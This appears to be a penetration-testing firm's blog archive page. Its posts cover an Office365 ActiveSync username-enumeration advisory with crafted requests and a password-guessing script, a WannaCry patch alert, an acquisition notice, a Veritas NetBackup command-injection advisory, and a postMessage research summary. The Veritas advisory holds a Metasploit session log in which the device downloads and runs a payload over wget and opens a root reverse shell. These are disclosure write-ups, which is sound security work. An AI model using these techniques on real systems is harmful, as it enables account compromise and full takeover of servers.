Office365 ActiveSync Username Enumeration


There is a simple username enumeration issue in Office365’s ActiveSync, Microsoft do not consider this a vulnerability so Sec-1 do not expect this issue to be fixed. Sec-1 Penetration Tester Oliver Morton has written a script to exploit this which is available here:

What is ActiveSync?

Exchange ActiveSync in Microsoft Exchange Server lets Windows Mobile powered devices and other Exchange ActiveSync enabled devices to access Exchange mailbox data. Compatible mobile devices can access e-mail, calendar, contact, and task data in addition to documents stored on Windows SharePoint Services sites and Windows file shares. Information synchronized with the mobile devices is retained and can be accessed offline. []

What is username enumeration?

Username enumeration is when an attacker can determine valid users in a system.

When the system reveals a username exists either due to misconfiguration or a design decision a username enumeration issue exists.

This is often identified in authentication interfaces, registration forms, and forgotten password functionality.

The information disclosed by the system can be used to determines a list of users which can then be used in further attacks such as a bruteforce – since the username is known to be correct, only the password needs to be guessed, greatly increasing the chances of successfully compromising an account.

The vulnerability

During the assessment of a 3rd party product which utilises ActiveSync, it was noted that the there was a clear response difference between a valid and invalid usernames submitted in the HTTP Basic Authentication Header.

Further investigation revealed that the issue was in fact in Office365 rather than the 3rd party product which was simply acting as a proxy. The domain for Office365’s ActiveSync service is trivial to identify if you have a mobile device configured to use Office365 for email (email app server settings):

In order to elicit a response from ActiveSync a number of parameters and headers are required, this is described in more detail here:

The username enumeration issue exists in the differing response to invalid vs valid usernames submitted in the Authorization header. This request header value consists of the username and password concatenated with a colon (:) separator and Base64 encoded.

The request below contains the following Base64 encoded credentials in the Authorization header:

OPTIONS /Microsoft-Server-ActiveSync HTTP/1.1
Connection: close
MS-ASProtocolVersion: 14.0
Content-Length: 0
Authorization: Basic dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE=

This elicits the following response (“401 Unauthorized”) indicating that the username is valid but the password is not:

HTTP/1.1 401 Unauthorized
Content-Length: 1293
Content-Type: text/html
Server: Microsoft-IIS/8.5
request-id: ab308ea5-9a01-4a1a-8d49-b91b3503e83f
X-BackEndHttpStatus: 401
WWW-Authenticate: Basic Realm="",Negotiate,Basic Realm=""
X-CalculatedBETarget: LO1P123MB0899.GBRP123.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 401
X-DiagInfo: LO1P123MB0899
X-BEServer: LO1P123MB0899
X-FEServer: LO1P123CA0018
WWW-Authenticate: Basic Realm=""
X-Powered-By: ASP.NET
X-FEServer: VI1PR0101CA0050
Date: Wed, 14 Jun 2017 14:35:14 GMT
Connection: close

The request below contains the following Base64 encoded credentials in the Authorization header:

OPTIONS /Microsoft-Server-ActiveSync HTTP/1.1
Connection: close
MS-ASProtocolVersion: 14.0
Content-Length: 2
Authorization: Basic aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ==

This elicits the following response (“404 Not Found” and “X-CasErrorCode: UserNotFound”) indicating that the username is invalid:

HTTP/1.1 404 Not Found
Cache-Control: private
Server: Microsoft-IIS/8.5
request-id: 6fc1ee3a-ec99-4210-8a4c-12967a4639fc
X-CasErrorCode: UserNotFound
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: HE1PR05CA0220
Date: Wed, 28 Jun 2017 11:23:03 GMT
Connection: close
Content-Length: 0

By iterating through a list of potential usernames and observing the response, it is possible to enumerate a list of valid users which can then be targeted for further attacks. These attacks may be directly against the authentication, i.e attempting to guess the user’s password to compromise their account, or it may be as part of a social engineering attack e.g sending Phishing emails to known valid users.

It should be noted that this issues requires an authentication attempt and is therefore likely to appear in logs, and has a risk of locking out accounts. However it is also possible that a valid username and password combination will be identified, in which case the response is different depending on if 2FA is enabled or not.

If 2FA is enabled the response is (“403 Forbidden” with title “403 – Forbidden: Access is denied.”):

HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Length: 1233
Content-Type: text/html
Server: Microsoft-IIS/8.5
request-id: 4095f6fa-5151-4699-9ea1-0ddf0cfab897
X-CalculatedBETarget: MM1P123MB0842.GBRP123.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 403
Set-Cookie: <snip>
X-MS-Credentials-Expire: 4
X-MS-Credential-Service-Federated: false
X-MS-BackOffDuration: L/-480
X-AspNet-Version: 4.0.30319
X-DiagInfo: MM1P123MB0842
X-BEServer: MM1P123MB0842
X-Powered-By: ASP.NET
X-FEServer: DB6PR07CA0008
Date: Fri, 07 Jul 2017 13:11:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "">
<html xmlns="">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>

If 2FA is NOT enabled the response is (“200 OK”):

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: application/
Server: Microsoft-IIS/8.5
request-id: da269652-6e98-4b49-8f14-ab57e7232b17
X-BackEndHttpStatus: 200
X-CalculatedBETarget: MMXP123MB0750.GBRP123.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 200
MS-Server-ActiveSync: 15.1
MS-ASProtocolVersions: 2.0,2.1,2.5,12.0,12.1,14.0,14.1,16.0,16.1
MS-ASProtocolCommands: Sync,SendMail,SmartForward,SmartReply,GetAttachment,GetHierarchy,CreateCollection,DeleteCollection,MoveCollection,FolderSync,FolderCreate,FolderDelete,FolderUpdate,MoveItems,GetItemEstimate,MeetingResponse,Search,Settings,Ping,ItemOperations,Provision,ResolveRecipients,ValidateCert,Find
X-MS-BackOffDuration: L/-470
X-AspNet-Version: 4.0.30319
X-DiagInfo: MMXP123MB0750
X-BEServer: MMXP123MB0750
X-FEServer: MMXP123CA0005
X-Powered-By: ASP.NET
X-FEServer: AM5P190CA0027
Date: Mon, 24 Jul 2017 09:50:22 GMT
Connection: close

It should be noted that only users with a valid mailbox are considered to be valid users in this context, therefore a domain account may exist which this enumeration would identify as invalid.

A brief check was conducted to determine if this issue affected Microsoft Exchange, or if it was limited to Office365. It was found that only Office365 was affected. This issue was reported this issue to Microsoft, however they do not consider username enumeration to “meet the bar for security servicing”, so Sec-1 do not expect this issue will be fixed.

My continuing mission to replace myself with a small script

In order to automate exploitation of this issue Oliver wrote a simple multi threaded python script. It is available here:

When provided a list of potential usernames(username@domain) this script will attempt to authenticate to ActiveSync with the password ‘Password1’. Valid and invalid usernames are logged along with valid username and password combinations (in case you get lucky).

Disclose Timeline

28 June 2017, 13:30: Emailed with a PGP encrypted PDF explaining issue with example HTTP  requests and responses.

28 June 2017, 22:39: Response from Microsoft (note only relevant section of email included below)

“Thank you for contacting the Microsoft Security Response Center (MSRC).  Upon investigation we have determined that these do not meet the bar for security servicing.  In general, username enumeration does not meet the bar as there are many ways to do this and on its own it does not allow an attacker access or control in any way, as the attacker would still need to bypass login.”

29 June 2017, 09:54: Emailed Microsoft stating intention to disclose in a blog post unless they had any serious objections.

24 July 2017: Details and tool disclosed to the public.

Posted in Advisories, Tools | Tagged , , , | Comments Off on Office365 ActiveSync Username Enumeration

Sec-1 is acquired by Claranet to strengthen its future security services

  • Leading MSP moves to enhance skills in penetration testing services to mitigate security breach risks
  • Sec-1 in a strong position to grow as a Claranet Group Company

Claranet, a leading managed IT services provider, has announced the acquisition of Sec-1 to boost IT security across the group.

Claranet’s interest in Sec-1 is to add our leading vulnerability and penetration testing and IT security services to its portfolio. The acquisition will also provide our customers and employees with many new opportunities, as Claranet offers a wide range of additional services that complement our areas of expertise. We also see opportunities over time to further enhance and develop the security services we currently offer.

With £310 million in revenue, over 6,500 customers and more than 1,800 employees based in 24 offices and 43 data centres across European countries, Claranet’s mission is to help its customers do amazing things. Its customers include River Island, Missguided, Pets at Home, Signet, MyOptique, Airbus, Peugeot, BBC, and ITV.

Speaking about the acquisition, Michel Robert, Claranet’s UK managing director, said:

“We are delighted to welcome Sec-1 to the Claranet Group. Sec-1’s experience with penetration testing and additional IT security services will complement our in-house expertise, leading to new and improved services for our customers. This acquisition represents the latest in a line of strategically-important deals that we’ve made over the past two years across Europe and in Brazil.”

Matt Hawnt, managing director at Sec-1 added:

“I am very proud of Sec-1’s reputation and track record and am delighted the company will continue to exist both as a trading entity and a brand. I will carry on in my current role as Sec-1’s Managing Director, alongside our co-founder, Gary O’Leary-Steele.”

Posted in News | Comments Off on Sec-1 is acquired by Claranet to strengthen its future security services

Malwaretech stems Wcry for now

The Internet’s Unsung Hero

Malwaretech registered the sandbox detection domain essentially shutting down any further spread overnight; but expect a new version to be released soon.

Update XP & 2003

Microsoft have issued an unusual – out of band – update for unsupported operating systems for ms17-010 for xp, 8, 2003 etc. Get patching immediately before a new version is released.




Posted in Advisories, News, Uncategorized | Tagged , , | Comments Off on Malwaretech stems Wcry for now

Weaponised Wanna Decryptor Worm

Patch MS17-010 NOW!!!

Cryptomalware which has affected Telefonica and other organisations in Spain; and the NHS in the UK has recently been confirmed as being a fully weaponised version of the crypto malware Wanna Decryptor (aka “Wannacry” and “Wcry”).
As far as we currently understand this new strain incorporates active exploitation of the vulnerability patched in the MS17-010 update released by Microsoft in March.

This is novel behaviour for cryptomalware and we expect this to have widespread effects. We strongly advise you to ensure all internal systems (especially critical domain controllers, fileservers and exchange servers) have the MS17-010 patch applied as soon as possible.

Additionally, ensure TCP ports 3389, 445 and 139 are not exposed to the Internet.

Because of the nature of malware propagation you should ensure that any back-ups are held offline; if backups are offline they cannot be encrypted in the event of your network being hit.

Further updates will be released as we investigate the nature of this attack but do ensure you follow major news feeds on twitter, LinkedIn etc…


Posted in Advisories, News | Comments Off on Weaponised Wanna Decryptor Worm

Veritas NetBackup Appliance Unauthenticated Remote Command Execution

Sec-1 Security Advisory
Severity : High
Advisory Name : Veritas NetBackup Appliance Unauthenticated Remote Command Execution
Discovery Date : 17/05/2016
Release Date : 04/10/2016
Application : NetBackup Appliance versions through to v2.7.3, and the v3.0 series
Platform : Linux
CVE : CVE-2016-7399
CVSSv3 Base Score : 10.0
Discovered by : Matthew Hall
Vendor Status : Emergency Engineering Binaries (EEBs) are available to fix this vulnerability on the following Encap releases of the NetBackup appliances: version, and 2.7.3.
See for more information.
Veritas are aware that the issue is present in the current version of the product. A fix is scheduled for the NetBackup Appliances v3.0 release.
References :

Vulnerability Summary

Unauthenticated Remote Command Execution

“Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.” (Source: OWASP).

“The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.” (Source: CWE-78)


One instance was identified where an unauthenticated attacker could gain RCE on the underlying RedHat Linux operating system through the NetBackup Web Management Interface at the following URL:


The GET parameter “hostName” is controlled by the user and is ultimately used as an argument in a system call to a perl script located at /opt/NBUAppliance/scripts/

It is possible to utilise backticks, semi-colon, ampersand, pipe characters and the bash subshell contruct “$()” to execute commands on the underlying operating system as the user which calls the script (root in this case).

As this vulnerability allows an unauthenticated attacker to gain root level privileges on the affected device, the effects could include:

  • Recovering sensitive data from system backups
  • Stealing cached credentials/password hashes from virtual machines backed up to the device
  • Enrolling the system into a botnet
  • Installation of a rootkit/backdoor for remote persistence into an internal network

Example Payload/POC

The RCE is “blind” – that is, the response from the server does not include the results of executed commands; as such, the following proof of concept can be used.

Calling the following URL will result in the server response being delayed by six seconds:


Testing for command execution can also be performed using Out of Band techniques such as “ping” or “nslookup”, e.g:


Performing a network capture from the attackers IP address should show the server sending two ICMP echo requests.

Exploit Example

A fully working exploit has been created for this issue for use within the Metasploit Framework. An example of its use is shown below.

This module available at the following URL until its incorporation into the Metasploit Framework – GitHub

msf > use exploit/linux/http/veritas_netbackup_exec
msf exploit(veritas_netbackup_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(veritas_netbackup_exec) > set RHOST
msf exploit(veritas_netbackup_exec) > set RPORT 443
RPORT => 443
msf exploit(veritas_netbackup_exec) > set SSL true
SSL => true
msf exploit(veritas_netbackup_exec) > info

Name: Veritas NetBackup Appliance Web Console OS Command Injection
Module: exploit/linux/http/veritas_netbackup_exec
Platform: Linux, Unix
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2016-05-17

Provided by:
Matthew Hall

Available targets:
Id Name
-- ----
1 Linux Payload

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DOWNFILE no Filename to download, (default: random)
DOWNHOST no An alternative host to request the payload from
HTTP_DELAY 60 yes Time that the HTTP Server will wait for the ELF payload request
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 443 yes The target port
SRVHOST yes The local host to listen on. This must be an address on the local machine or
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload information:

The Veritas NetBackup Appliance is vulnerable to an unauthenticated
OS Command Injection Vulnerability via arguments passed to backend
perl scripts when performing license verification. Since it is a
blind os command injection vulnerability, there is no output for the
executed command when using the cmd generic payload. This module was
tested against a Veritas NetBackup Appliance Version 2.7.2. A ping
command against a controlled system could be used for testing
purposes. The exploit uses the wget client from the device to
convert the command injection into an arbitrary payload execution.

msf exploit(veritas_netbackup_exec) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on
msf exploit(veritas_netbackup_exec) > [*] - Starting up our web service on ...
[*] Using URL:
[*] - Asking the Veritas device to download
[*] - Sending Command /usr/bin/wget%20http://
[*] - Sending the payload to the server...
[*] - Waiting for the victim to request the ELF payload...
[*] - Asking the Veritas device to chmod lKYbcvGEQ
[*] - Sending Command chmod%20777%20/tmp/hbtoqwqc
[*] - Asking the Veritas device to execute lKYbcvGEQ
[*] - Sending Command /tmp/hbtoqwqc
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to
[*] Meterpreter session 1 opened ( -> at 2016-05-17 12:36:28 +0100
[+] Deleted /tmp/hbtoqwqc

msf exploit(veritas_netbackup_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > sysinfo
Computer : .site
OS : Linux .site 2.6.32-504.30.3.el6.x86_64 #1 SMP Thu Jul 9 15:20:47 EDT 2015 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter >

meterpreter > ls
Listing: /opt/SYMCnbappws

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40700/rwx------ 4096 dir 2016-04-27 12:57:23 +0100 Security
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:14 +0100 XSD
100664/rw-rw-r-- 7548948 fil 2016-01-20 12:48:40 +0000 appliancews.war
40775/rwxrwxr-x 4096 dir 2016-04-27 13:30:51 +0100 bin
40775/rwxrwxr-x 4096 dir 2016-04-30 15:40:17 +0100 config
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:15 +0100 docs
40775/rwxrwxr-x 4096 dir 2016-04-27 12:57:25 +0100 eat
40755/rwxr-xr-x 4096 dir 2016-04-27 12:29:49 +0100 jre
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:21 +0100 lib
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:21 +0100 resources
100755/rwxr-xr-x 12223204 fil 2016-01-20 13:06:50 +0000 server-2.7.2.war
100664/rw-rw-r-- 9722862 fil 2016-01-20 12:48:40 +0000 symhelp.war
40775/rwxrwxr-x 4096 dir 2016-04-27 12:56:22 +0100 webserver

meterpreter > pwd

Vendor Response

As of version, and 2.7.3 this vulnerability has been reported as being fixed. Veritas are aware that the issue is present in the current version of the product. A fix has been scheduled for the NetBackup Appliances v3.0 release.
Sec-1 would like to thank Veritas for their very professional and prompt responses in dealing with this matter.

Posted in Advisories, Tools | Comments Off on Veritas NetBackup Appliance Unauthenticated Remote Command Execution

Hunting HTML 5 postMessage Vulnerabilities

Download Paper: Hunting postMessage Vulnerabilities

Download Sample Code: sample code

Sec-1 Ltd partnered with to undertake a research project investigating the security challenges posed by next generation web applications. The project included an investigation of Cross-Origin communication mechanisms provided via HTML5 including postMessage and CORS.

One of the key findings from the research shows that vulnerabilities introduced through an insecure postMessage implementation are frequently missed by security scanners and consultants performing manual review.

Summary of findings:

  • Cross-Origin communication via postMessage introduces a tainted data source that is difficult to identify using currently available tools.
  • Cross-Site Scripting and Information disclosure vulnerabilities as a result of insecure postMessage code were identified across many Fortune 500 companies and websites listed within the Alexa Top 10. Three case study reports (Adobe, Apple iCloud and YouTube) are included within this paper.
  • Discussion with members of the development and information security communities show that the vulnerabilities demonstrated within this document are poorly understood. In many cases postMessage events were not readily identified as a potential source for malicious tainted data.
  • In many cases vulnerable code is introduced via third party libraries and therefore may undermine the security of an otherwise secure application.

This paper aims to provide an overview of the most common postMessage security flaws and introduce a methodology and toolset for quickly identifying vulnerabilities during the course of a Black-box security assessment.

Proof of Concept Example:

The following video demonstrates a postMessage flaw identified within the Apple iCloud service. A full analysis of the flaw can be found within the Hunting postMessage Vulnerabilities whitepaper

Proof of Concept:

The following video demonstrates a postMessage flaw identified within A full analysis of the flaw can be found within the Hunting postMessage Vulnerabilities whitepaper

Posted in News, Tools, White Papers | Comments Off on Hunting HTML 5 postMessage Vulnerabilities